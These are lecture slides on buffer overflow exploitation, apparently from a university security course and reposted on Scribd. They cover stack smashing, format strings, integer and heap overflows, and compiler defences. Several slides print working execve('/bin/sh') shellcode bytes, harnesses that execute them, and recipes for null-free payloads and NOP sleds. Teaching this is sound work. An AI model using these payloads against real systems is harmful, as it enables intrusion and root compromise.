0% found this document useful (0 votes)
129 views78 pages

Buffer

Buffer overflows occur when data is written outside the allocated buffer space, particularly in C where bounds checking is not enforced. The document explains stack-based and heap-based buffer overflows, provides examples of code that can lead to such vulnerabilities, and discusses the implications of executing injected code. Additionally, it covers techniques for exploiting these vulnerabilities, including shellcode injection and the execution of system calls.

Uploaded by

Menberu Munye
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
129 views78 pages

Buffer

Buffer overflows occur when data is written outside the allocated buffer space, particularly in C where bounds checking is not enforced. The document explains stack-based and heap-based buffer overflows, provides examples of code that can lead to such vulnerabilities, and discusses the implications of executing injected code. Additionally, it covers techniques for exploiting these vulnerabilities, including shellcode injection and the execution of system calls.

Uploaded by

Menberu Munye
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

What are Buffer Overflows?

A buffer overflow occurs when data is written


outside of the space allocated for the buffer.
• C does not check that writes are in-bound

1. Stack-based
– covered in this class
2. Heap-based
– more advanced
– very dependent on system and library version

1
Basic Example
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} argc
return addr
Dump of assembler code for function main: caller’s ebp
0x080483e4 <+0>: push %ebp %ebp
buf
0x080483e5 <+1>: mov %esp,%ebp
(64 bytes)
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
2
2
“123456”
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} argc
return addr
Dump of assembler code for function main: caller’s ebp
0x080483e4 <+0>: push %ebp %ebp
buf
0x080483e5 <+1>: mov %esp,%ebp
(64 bytes)
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax

123456\0
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
3
3
“A”x68 . “\xEF\xBE\xAD\xDE”
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} corrupted argc
overwritten 0xDEADBEEF
return addr
Dump of assembler code for function main: overwritten caller’s
AAAAebp
0x080483e4 <+0>: push %ebp %ebp
buf
0x080483e5 <+1>: mov %esp,%ebp
(64 bytes)

AAAA… (64 in total)


0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
4
4
Frame teardown—1
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} corrupted argc
overwritten 0xDEADBEEF
Dump of assembler code for function main: %esp
overwritten AAAA
0x080483e4 <+0>: push %ebp and
0x080483e5 <+1>: mov %esp,%ebp %ebp
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
leave
0x080483ed <+9>: mov 4(%eax),%eax
1. mov %ebp,%esp
0x080483f0 <+12>: mov %eax,4(%esp) 2. pop %ebp
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt>
=> 0x080483ff <+27>: leave
0x08048400 <+28>: ret %esp
5
5
Frame teardown—2
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} corrupted argc
overwritten 0xDEADBEEF
%esp
Dump of assembler code for function main:
0x080483e4 <+0>: push %ebp %ebp = AAAA
0x080483e5 <+1>: mov %esp,%ebp
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
leave
0x080483ed <+9>: mov 4(%eax),%eax
1. mov %ebp,%esp
0x080483f0 <+12>: mov %eax,4(%esp) 2. pop %ebp
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt>
0x080483ff <+27>: leave
0x08048400 <+28>: ret
6
6
Frame teardown—3
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} corrupted argc
%esp

Dump of assembler code for function main:


0x080483e4 <+0>: push %ebp
0x080483e5 <+1>: mov %esp,%ebp
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
%eip = 0xDEADBEEF
0x080483ed <+9>: mov 4(%eax),%eax
(probably crash)
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt>
0x080483ff <+27>: leave
0x08048400 <+28>: ret
7
7
Shellcode

Traditionally, we inject assembly
argv
instructions for exec(“/bin/sh”)
argc
into buffer.
&buf

%ebp
• see “Smashing the stack for
fun and profit” for exact string
• or search online

shellcode…

0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
8
Executing system calls
execve(“/bin/sh”, 0, 0);
1. Put syscall number in eax
2. Set up arg 1 in ebx, arg 2 in ecx, arg
3 in edx execve is
0xb
3. Call int 0x80*
4. System call runs. Result in eax
addr. in ebx,
0 in ecx

* using sysenter is faster, but this is the traditional explanation 9


Shellcode example
Notice no NULL
xor ecx, ecx chars. Why?
mul ecx
push ecx
push 0x68732f2f "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f”
"\x73\x68\x68\x2f\x62\x69\x6e\x89”
push 0x6e69622f "\xe3\xb0\x0b\xcd\x80”;
mov ebx, esp
mov al, 0xb Executable String
int 0x80

Shellcode
10
Author: kernel_panik, [Link]
Program Example
#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"


"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\xb0\x0b\xcd\x80";

int main(int argc, char **argv)


{
printf ("Shellcode length : %d bytes\n", strlen (code));
int(*f)()=(int(*)())code;
f();
}
$ gcc -o shellcode -fno-stack-protector
-z execstack shellcode.c

11
Author: kernel_panik, [Link]
Execution
xor ecx, ecx 0x0 0x0
mul ecx 0x68 h
push ecx 0x73 s
push 0x68732f2f 0x2f /
push 0x6e69622f ebx esp
0x2f /
mov ebx, esp ecx 0
0x6e n
mov al, 0xb eax 0x0b
0x69 i
int 0x80 Registers
0x62 b
esp 0x2f /
Shellcode
12
Author: kernel_panik, [Link]
Tips
Factors affecting the stack frame: …
• statically declared buffers may be padded argv
• what about space for callee-save regs? argc
• [advanced] what if some vars are in regs only? return addr
• [advanced] what if compiler reorder caller’s ebp
%ebp
local variables on stack? buf

gdb is your friend!


(google gdb quick reference)

Don’t just brute force or guess offsets.


Think! argv[1]
buf
%esp
13
nop slides
WARNING: Environment env

changes address of buf argv
$ OLDPWD=“” ./vuln Overwrite argc
nop with any
return addr
vs. position in
nop slide ok caller’s ebp
$ OLDPWD=“aaaa” ./vuln buf
execve

0x90
...
nop slide 0x90
Protip: Inserting nop’s (e.g., argv[1]
0x90) into shellcode allow buf
for slack
14
Recap
To generate exploit for a basic buffer overflow:

1. Determine size of stack frame up to head of buffer


2. Overflow buffer with the right size
shellcode padding &buf

computation + control

15
Stack Buffers

• Suppose Web server contains this function


void func(char *str) { Allocate local buffer
(126 bytes reserved on stack)
char buf[126];
strcpy(buf,str); Copy argument into local buffer
}

• When this function is invoked, a new frame


with local variables is pushed onto the stack
Stack grows this way

ret Frame of the Top of


buf sfp addr str calling function stack

Local variables Pointer to Execute code Arguments


previous at this address
frame after func() finishes

slide 16
What If Buffer is Overstuffed?
• Memory pointed to by str is copied onto stack…
void func(char *str) {
char buf[126]; strcpy does NOT check whether the string
strcpy(buf,str); at *str contains fewer than 126 characters
}
• If a string longer than 126 bytes is copied into buffer, it will overwrite
adjacent stack locations

Frame of the Top of


buf overflow str
calling function stack

This will be
interpreted
as return address!

slide 17
Executing Attack Code
• Suppose buffer contains attacker-created string
– For example, *str contains a string received from the
network as input to some network service daemon

Frame of the Top of


code ret str calling function stack

Attacker puts actual assembly In the overflow, a pointer back


instructions into his input string, e.g., into the buffer appears in
binary code of execve(“/bin/sh”) the location where the system
expects to find return address

• When function exits, code in the buffer will be


executed, giving attacker a shell
– Root shell if the victim program is setuid root slide 18
Stack Corruption (Redux)
int bar (int val1) {
int val2;
foo (a_function_pointer); val1 String
} val2 grows
Contaminated
memory

int foo (void (*funcp)()) { arguments (funcp)


char* ptr = point_to_an_array;
char buf[128]; return address
gets (buf); Previous Frame Pointer
strncpy(ptr, buf, 8); Most popular pointer var (ptr)
(*funcp)(); target
buffer (buf) Stack
}
grows

slide 19
Attack #1: Return Address
② set stack pointers to
return to a dangerous
library function
Attack code “/bin/sh”
args (funcp)
① system()
return address
① Change the return address to point
PFP
to the attack code. After the
function returns, control is pointer var (ptr)
transferred to the attack code buffer (buf)
② … or return-to-libc: use existing
instructions in the code segment
such as system(), exec(), etc. as
the attack code
slide 20
Buffer Overflow Issues
• Executable attack code is stored on stack, inside
the buffer containing attacker’s string
– Stack memory is supposed to contain only data, but…
• For the basic attack, overflow portion of the buffer
must contain correct address of attack code in the
RET position
– The value in the RET position must point to the
beginning of attack assembly code in the buffer
• Otherwise application will crash with segmentation violation
– Attacker must correctly guess in which stack position
his buffer will be when the function is called
slide 21
Problem: No Range Checking
• strcpy does not check input size
– strcpy(buf, str) simply copies memory contents into
buf starting from *str until “\0” is encountered,
ignoring the size of area allocated to buf
• Many C library functions are unsafe
– strcpy(char *dest, const char *src)
– strcat(char *dest, const char *src)
– gets(char *s)
– scanf(const char *format, …)
– printf(const char *format, …)
slide 22
Does Range Checking Help?
• strncpy(char *dest, const char *src, size_t n)
– If strncpy is used instead of strcpy, no more than n
characters will be copied from *src to *dest
• Programmer has to supply the right value of n
• Potential overflow in htpasswd.c (Apache 1.3):
Copies username (“user”) into buffer (“record”),
… strcpy(record,user); then appends “:” and hashed password (“cpw”)
strcat(record,”:”);
strcat(record,cpw); …

• Published “fix” (do you see the problem?):


… strncpy(record,user,MAX_STRING_LEN-1);
strcat(record,”:”);
strncat(record,cpw,MAX_STRING_LEN-1); …
slide 23
Misuse of strncpy in htpasswd “Fix”

• Published “fix” for Apache htpasswd overflow:


… strncpy(record,user,MAX_STRING_LEN-1);
strcat(record,”:”);
strncat(record,cpw,MAX_STRING_LEN-1); …

MAX_STRING_LEN bytes allocated for record buffer

contents of *user : contents of *cpw

Put “:” Again put up to MAX_STRING_LEN-1


Put up to MAX_STRING_LEN-1
characters into buffer
characters into buffer

slide 24
Attack #2: Pointer Variables

Global Offset Table


Attack code
Function pointer ①
args (funcp)
return address
① Change a function pointer to point PFP
to the attack code ② pointer var
② Any memory, even not in the stack, (ptr)
can be modified by the statement buffer (buf)
that stores a value into the
compromised pointer
strncpy(ptr, buf, 8);
*ptr = 0;
slide 25
Off-By-One Overflow
• Home-brewed range-checking string copy
void notSoSafeCopy(char *input) { This will copy 513
char buffer[512]; int i; characters into
buffer. Oops!
for (i=0; i<=512; i++)
buffer[i] = input[i];
}
void main(int argc, char *argv[]) {
if (argc==2)
notSoSafeCopy(argv[1]);
}

1-byte overflow: can’t change RET, but can change


pointer to previous stack frame
On little-endian architecture, make it point into buffer
RET for previous function will be read from buffer!
slide 26
Attack #3: Frame Pointer

return address
PFP

Attack code args (funcp)


return address
PFP
① Change the caller’s saved frame pointer var (ptr)
pointer to point to attack-controlled buffer (buf)
memory. Caller’s return address will
be read from this memory.

slide 27
Two’s Complement
Binary representation of negative integers
Represent X (where X<0) as 2N-|X|
 N is word size (e.g., 32 bits on x86 architecture)

1 0 0 0 0

0 1

231-1 0 1 1 1

1 1

-1 1 1 1 1

1 1
231 ??
-2 1 1 1 1

1 0

-231 1 0 0 0

0 0

slide 28
Integer Overflow

static int getpeername1(p, uap, compat) {


// In FreeBSD kernel, retrieves address of peer to which a socket is connected

struct sockaddr *sa;
… Checks that “len” is not too big
len = MIN(len, sa->sa_len); Negative “len” will always pass this check…
… copyout(sa, (caddr_t)uap->asa, (u_int)len);

} … interpreted as a huge
unsigned integer here
Copies “len” bytes from
kernel memory to user space … will copy up to 4G of
kernel memory

slide 29
Heap Overflow

• Overflowing buffers on heap can change pointers


that point to important data
– Sometimes can also transfer execution to attack code
• For example, December 2008 attack on XML parser in Internet
Explorer 7 - see [Link]
• Illegitimate privilege elevation: if program with
overflow has sysadm/root rights, attacker can use
it to write into a normally inaccessible file
– For example, replace a filename pointer with a pointer
into buffer location containing name of a system file
• Instead of temporary file, write into [Link]
slide 30
Variable Arguments in C
• In C, can define a function with a variable
number of arguments
– Example: void printf(const char* format, …)
• Examples of usage:

Format specification encoded by


special %-encoded characters
%d,%i,%o,%u,%x,%X – integer argument
%s – string argument
%p – pointer argument (void *)
Several others

slide 31
Implementation of Variable Args
• Special functions va_start, va_arg, va_end
compute arguments at run-time (how?)

slide 32
Activation Record for Variable Args

va_arg(ap,type) va_start computes


retrieves next arg location on the stack
from offset ap past last statically
known argument

slide 33
Format Strings in C
• Proper use of printf format string:
… int foo=1234;
printf(“foo = %d in decimal, %X in hex”,foo,foo); …
• This will print
foo = 1234 in decimal, 4D2 in hex

• Sloppy use of printf format string:


… char buf[13]=“Hello, world!”;
printf(buf);
// should’ve used printf(“%s”, buf); …

• If the buffer contains a format symbol starting with %, location


pointed to by printf’s internal stack pointer will be interpreted
as an argument of printf. This can be exploited to move
printf’s internal stack pointer!
slide 34
Writing Stack with Format Strings
• %n format symbol tells printf to write the
number of characters that have been printed
… printf(“Overflow this!%n”,&myVar); …
• Argument of printf is interpeted as destination address
• This writes 14 into myVar (“Overflow this!” has 14
characters)
• What if printf does not have an argument?
… char buf[16]=“Overflow this!%n”;
printf(buf); …

• Stack location pointed to by printf’s internal stack pointer


will be interpreted as address into which the number of
characters will be written!
slide 35
Using %n to Mung Return Address
This portion contains
enough % symbols
to advance printf’s Buffer with attacker-supplied
internal stack pointer
input string

“… attackString%n”, attack code &RET RET

Number of characters in Overwrite location under printf’s stack


attackString must be pointer with RET address; Return
execution to
equal to … what? printf(buffer) will write the number of this address
characters in attackString into RET

C has a concise way of printing multiple symbols: %Mx will print exactly M bytes (taking them from the
stack). If attackString contains enough “%Mx” so that its total length is equal to the most significant
byte of the address of the attack code, this byte will be written into &RET.
Repeat three times (four “%n” in total) to write into &RET+1, &RET+2, &RET+3, replacing RET with the
address of attack code.

• See “Exploting Format String Vulnerabilities” for details


slide 36
Other Targets of Memory Exploits
• Configuration parameters
– E.g., directory names that confine remotely
invoked programs to a portion of the server’s file
system
• Pointers to names of system programs
– For example, replace the name of a harmless
script with an interactive shell
– This is not the same as return-to-libc (why?)
• Branch conditions in input validation code
slide 37
SSH Authentication Code

write 1 here Loop until one of


the authentication
methods succeeds

detect_attack() prevents
checksum attack on SSH1…

…and also contains an


overflow bug which permits
the attacker to put any value
into any memory location

Break out of authentication


loop without authenticating
properly

slide 38
Background-layout of the Virtual Space of a Process

The
layout of
the
virtual
space of
a
process
in Linux
Cont.
• Code and data consist of instructions and initialized ,
uninitialized global and static data respectively;
• Runtime heap is used for dynamically allocated
memory(malloc());
• The stack is used whenever a function call is made.
Layout Of Stack

• Grows from high-end address to low-end address (buffer


grows from low-end address to high-end address);
• Return Address- When a function returns, the instructions
pointed by it will be executed;
• Stack Frame pointer(esp)- is used to reference to local
variables and function parameters.
Example
low-end
address
esp
int cal(int a, int b)‫‏‬ c
{
int c; ebp previous ebp
c = a + b;
return c; Ret addr(0x08048229)‫‏‬
} a(1)‫‏‬

int main ()‫‏‬ b(2)‫‏‬


{
int d;
d = cal(1, 2);
printf("%d\n", d);
return;
}
high-end
Stack address
Dump of assembler code for
function main:
0x08048204 <main+0>: lea 0x4(%esp),%ecx
0x08048208 <main+4>: and $0xfffffff0,%esp
0x0804820b <main+7>: pushl -0x4(%ecx)‫‏‬
0x0804820e <main+10>: push %ebp
0x0804820f <main+11>: mov %esp,%ebp
0x08048211 <main+13>: push %ecx
0x08048212 <main+14>: sub $0x24,%esp
0x08048215 <main+17>: movl $0x2,0x4(%esp) ; pass
parameter
0x0804821d <main+25>: movl $0x1,(%esp) ; pass
parameter
0x08048224 <main+32>: call 0x80481f0 <cal>
0x08048229 <main+37>: mov %eax,-0x8(%ebp)‫‏‬
0x0804822c <main+40>: mov -0x8(%ebp),%eax
0x0804822f <main+43>: mov %eax,0x4(%esp)‫‏‬
0x08048233 <main+47>: movl $0x80a0c88,(%esp)‫‏‬
0x0804823a <main+54>: call 0x8048c40 <printf>
0x0804823f <main+59>: add $0x24,%esp
0x08048242 <main+62>: pop %ecx
0x08048243 <main+63>: pop %ebp
0x08048244 <main+64>: lea -0x4(%ecx),%esp
0x08048247 <main+67>: ret
Dump of assembler code for function cal:
0x080481f0 <cal+0>: push %ebp
0x080481f1 <cal+1>: mov %esp,%ebp
0x080481f3 <cal+3>: sub $0x10,%esp ; reserve 16 bytes for local variables in
stack
0x080481f6 <cal+6>: mov 0xc(%ebp),%eax
0x080481f9 <cal+9>: add 0x8(%ebp),%eax
0x080481fc <cal+12>: mov %eax,-0x4(%ebp)‫‏‬
0x080481ff <cal+15>: mov -0x4(%ebp),%eax
0x08048202 <cal+18>: leave
0x08048203 <cal+19>: ret
Layout of Heap
• Global variables
• Static variables
• Dynamically allocated memory
Stack Buffer Overflow
• A buffer overflow occurs when too much data is put into the
buffer;
• C language and its derivatives(C++) offer many ways to put
more data than anticipated into a buffer;
Example
Int bof()‫‏‬ ESP
{ AAAA
char buffer[8]; // an 8 bytes buffer which is in the
stack AAAA
strcpy(“buffer,‫“‏‬AAAAAAAAAAAAAAAAAAA””);‫‏‬//
copy 20 bytes into buffer EBP AAAA (previous EBP)‫‏‬
//‫‏‬this‫‏‬will‫‏‬cause‫‏‬to‫‏‬the‫‏‬content‫‏‬of‫“‏‬ret”‫‏‬to‫‏‬be‫‏‬
overwritten;
// namely, the return address will be AAAA (RET-
0x41414141(AAAA)‫‏‬ >printf())‫‏‬
return 1;
AAAA
}

int main ()‫‏‬


{
bof(); // call bof
printf(“end\n”);‫‏‬// will never be executed;
return 1;
}
Basic Idea of the Attack using stack buffer overflow

Low
address
String  Inject malicious code
Local variable (buffer)‫‏‬ into the virtual space of
grows
Stack
a process;
grows
Modify the content of
RET to redirect the
RET execution flow to the
malicious code.

Attack Code

High TOP of Stack


address
Example
 Program asks for a serial number that attacker does not know
 Attacker also does not have source code

 Attacker does have the executable (exe)‫‏‬

• Program quits on incorrect serial number


Cont.
• By trial and error, attacker discovers an apparent buffer overflow

• Note that 0x41 is “A”


• Looks like ret overwritten by 2 bytes!
• I think the stack is overwitten by 3 bytes.
Cont.

The goal is to exploit a buffer overflow so that the execution flow can be re-
directed to 0x00401034.
Cont.
• Find that 401034 is‫^@“‏‬P4”‫‏‬in‫‏‬ASCII‫\'(‏‬0' is 00)‫‏‬

• Byte order is reversed? Why?


• X86 processors are “little-endian”
Cont.
• Reverse‫‏‬the‫‏‬byte‫‏‬order‫‏‬to‫“‏‬4^P@”‫\(‏‬x34\x10\x40\x00)‫‏‬and…

• Success! We’ve bypassed serial number check by exploiting


a buffer overflow
• Overwrote the return address on the stack
Example-Create a shell
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main(){ Shellcode can be looked as a


char *name[2]; sequence of binary instructions;
name[0] = "/bin/sh"; The purpose of this shellcode
name[1] = 0x0; is to create a command shell in
execve(name[0], name, 0x0); linux.
exit(0); It can be used to create a
}
shell with root privilege.
Cont.
void sh()‫‏‬
{
int *return;
return = (int *)&return + 2; // let ret point to the unit containing the return address
(*return) = (int)shellcode; // let the return address point to the shellcode (shell code
to create a shell)‫‏‬
}

int main()‫‏‬
{
sh();
printf("main end :)\n");
return;
}
Cont.
(gdb) disas sh
Dump of assembler code for function sh:
0x08048208 <sh+0>: push %ebp return
0x08048209 <sh+1>: mov %esp,%ebp
0x0804820b <sh+3>: sub $0x10,%esp
0x0804820e <sh+6>: lea -0x4(%ebp),%eax Previous ebp
0x08048211 <sh+9>: add $0x8,%eax
0x08048214 <sh+12>: mov %eax,-
RET
0x4(%ebp)‫‏‬
0x08048217 <sh+15>: mov -
0x4(%ebp),%edx
0x0804821a <sh+18>: mov
$0x80bd6a0,%eax
0x0804821f <sh+23>: mov
%eax,(%edx)‫‏‬
0x08048221 <sh+25>: leave
0x08048222 <sh+26>: ret
Three issues for injecting codes
• How to find a location in the stack to inject malicious code?
• How to generate a shellcode (Attack Code)?
• How to redirect the execution flow to the shellcode?
– If using stack buffer overflow, the content of memory unit
storing return address should be modified.
– The injected payload should be long enough to do
overwriting.
How to find a location to inject code
• If using stack buffer overflow, we might need to locate the stack of a
function.
• Then we need to determine the offset from the bottom or the top
of stack to inject the shell code
• We can use the following code to locate a stack:

unsigned long find_start(void)‫‏‬


{
__asm__("movl %esp, %eax");
}

unsigned long find_end(void)‫‏‬


{
__asm__("movl %ebp, %eax");
}
Cont.

unsigned long find_start(void)‫‏‬


{
__asm__("movl %esp, %eax");
}

unsigned long find_end(void)‫‏‬


{
__asm__("movl %ebp, %eax");
}

int main()‫‏‬
{
printf("0x%x\n",find_start());
printf("0x%x\n",find_end());
}
Shell code
• Shellcode is defined as a set of instructions which is injected and
then is executed by an exploited program;
• Shellcode is used to directly manipulate registers and the function
of a program;
• Most of shellcodes use system call to do malicious behaviors;
• System calls is a set of functions which allow you to access
operating system-specific functions such as getting input, producing
output, exiting a process;
How to execute a system call in Linux?

• Use libc wrappers


– Ex: read, write etc;
– Works indirectly with assembly code to execute system calls;
• Directly use assembly code
– System call via software interrupts, for example int 0x80;

In Linux, a shell code uses int 0x80 to raise system calls.


The process of executing a system call
• The specific system call is loaded into EAX;
• Arguments to the system call function are placed in other registers;
• The Instruction int 0x80 is executed;
• The CPU switches to Kernel mode;
• The system call function is executed.

Example:
main()‫‏‬
{
 exit(0);
}
Cont.
gcc -g -static -o exit exit.c
gdb exit
Arlington:/home/src/shellcodes/code/ch03# gdb exit
GNU gdb 6.7.1-debian
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <[Link]
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1".
(gdb) disas _exit
Dump of assembler code for function _exit:
0x0804df4c <_exit+0>: mov 0x4(%esp),%ebx
0x0804df50 <_exit+4>: mov $0xfc,%eax
0x0804df55 <_exit+9>: int $0x80
0x0804df57 <_exit+11>:mov $0x1,%eax
0x0804df5c <_exit+16>: int $0x80
0x0804df5e <_exit+18>: hlt
End of assembler dump.
Write a shell code for exit()‫‏‬
• The shell code should do the following:
– Store the value of 0 into EBX;
– Store the value of 1 into EAX;
– Execute int 0x80 instruction
Cont.

First, we write ASM codes ([Link]) as follows:

Section .text
global _start

_start:

mov ebx, 0
mov eax, 1
int 0x80
Cont.
Arlington:/home/src/shellcodes/# nasm -f elf [Link]
Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o
Arlington:/home/src/shellcodes/# objdump -d exit_1

exit_1: file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
8048060: bb 00 00 00 00 mov $0x0,%ebx
8048065: b8 01 00 00 00 mov $0x1,%eax
804806a: cd 80 int $0x80
Red words can be used as the shell code.
Cont.
char shellcode[] = "\xbb\x00\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";

int main()‫‏‬
{

int *return;
return = (int *)&return + 2;
(*return) = (int)shellcode;
}
Injectable Shellcode
• Null (\x00) will cause shellcode to fail when injected into a
character array because \x00 is used to terminate strings;
• Injectable shellcode can't contain \x00;
• shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" is not an
injectable shellcode;
• How to remove \x00?
• Use “xor ebx, ebx” to replace “mov ebx, 0”
• Use “mov al, 1 ” to replace “mov eax, 1”
Cont.
bb 00 00 00 00 mov $0x0,%ebx
b8 01 00 00 00 mov $0x1,%eax
cd 80 int $0x80

After the transformation, the code is changed to :

31 db xor %ebx, %ebx


b0 01 mov $0x1,%al
cd 80 int 0x80

shellcode[]=”\x31\xdb\xb0\x01\xcd\x80”
A framework for injectable shellcode

Jmp short GotoCall

shellcode:
pop esi // esi will contain the address of '/bin/sh'
<shellcode meat>

GotoCall:
Call shellcode // GetPC code
Db '/bin/sh'
GetPC Code
• Call
• fsave/fstenv
• Can be used to get the address of last FPU instruction
– fldz
– fnstenv [esp-12]
– pop ecx
– add cl, 10
– nop
– ECX will hold the address of the EIP.
An Example
section .text
global _start
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax, eax
mov byte [esi + 7], al
lea ebx, [esi]
mov long [esi + 8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 0x80
GotoCall:
Call shellcode // GetPC Code
db '/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters
for system calls
NOP Sled
• Determining the correct offset for injecting code is not easy;
• NOP (non operation) sled can be used to increase the number of
potential offsets;
• Generally, we can fill in the beginning of shellcode with NOPs.
• The opcode for NOP is 0x90
• EX: shellcode*+=”\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80”
• Some FPU, SSE, MMX instructions can also be used as sled .
Summary of Launching An Attack
• Find a buffer overflow that can be used to
redirect the control flow of the victim program
– Stack Buffer Overflow
– Heap Buffer Overflow
• Inject a segment of malicious shellcode
How to prevent stack buffer overflow?
• Stack Guard
– In a stack , a canary word is placed after return address
whenever a function is called;
– The canary will be checked before the function returns. If value
of canary is changed , then it indicates an malicious behavior.

Local Lower address

Variables
Old Base Pointer
Canary Value
Return
Address
Arguments
Higher address
6. Unix Stack
Frame
Cont.
• Canary can still be intact if the attacker overwrites it with the
correct value
– Solution – use “random canary” value
– Use “terminator canary” – consists of all string terminator sequences – NULL,
‘\r’, ‘\n’, -1…
• Attacker can still point to the ‘return address’ and change it,
without worrying about the canary
– This is a short-coming of StackGuard
– Can be dealt by XORing the canary value and ‘return address’ to detect if
‘return address’ has changed
Stack Shield.
• Stack Shield
– Copy RET address into an unoverflowable memory region;
– The values of two RET addresses will be compared before a
function returns;
– If the values are different, then an malicious exploitation occurs;
– Needs another stack-like data structure to maintain RET
addresses.
ProPolice
• Perhaps most sophisticated
compiler protection
• Rearrange local variables such
Local Variables
that char buffers always are
and Pointers
allocated at bottom addresses ( Lower address
top of the stack), and are
guarded by a Guard Value Local char buffers
• Does not work fine with small
Guard Value
buffers – somewhat unstable
Old Base Pointer
Return Address
Arguments
Higher address
7. Unix Stack Frame

You might also like